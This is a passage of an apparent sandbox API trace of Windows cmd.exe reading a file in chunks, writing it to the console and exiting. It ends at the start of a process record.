[0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType 
(hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.885] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.885] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.885] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, 
lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.886] GetFileType (hFile=0x4c) returned 0x1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.886] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.913] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, 
lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.914] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.915] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, 
lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 
| out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.916] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.916] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.917] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 
[0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, 
lpNumberOfBytesRead=0x12e030*=0x32, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x32, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.918] _close (_FileHandle=4) returned 0 [0193.918] FindNextFileW (in: hFindFile=0x1f0e58, lpFindFileData=0x12f0a4 | out: lpFindFileData=0x12f0a4) returned 0 [0193.919] GetLastError () returned 0x12 [0193.919] FindClose (in: hFindFile=0x1f0e58 | out: hFindFile=0x1f0e58) returned 1 [0193.919] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0193.919] _close (_FileHandle=3) returned 0 [0193.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.920] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.920] SetConsoleInputExeNameW () returned 0x1 [0193.920] GetConsoleOutputCP () returned 0x1b5 [0193.920] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.920] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.920] exit (_Code=0) Process: id = "444" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = 
